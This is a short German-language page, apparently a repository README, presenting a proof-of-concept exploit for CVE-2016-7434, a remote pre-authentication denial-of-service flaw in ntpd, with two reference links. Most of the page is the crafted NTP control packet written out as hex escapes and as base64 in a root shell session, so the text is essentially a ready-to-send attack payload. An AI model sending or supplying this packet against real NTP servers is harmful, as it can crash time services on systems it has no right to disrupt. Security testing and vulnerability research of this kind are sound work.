
Proof-of-Concept-Exploit für CVE-2016-7434, eine Remote-Pre-Authentication-Denial-of-Service-Sicherheitslücke in ntpd. Enthält Exploit-Code und technische Referenzen für Sicherheitstests.
CVE-2016-7434 ntpd remote pre-auth Denial-of-Service PoC's/Informationen
Quellen:
http://dumpco.re/cve-2016-7434/
https://www.exploit-db.com/exploits/40806/
root@nop:~/code/CVE-2016-7434# echo -e "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP
root@nop:~/code/CVE-2016-7434# echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsYWRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" |base64 -d
6nonce, laddr=[]:Hrags=32, laddr=[]:WOP2, laddr=[]:WOP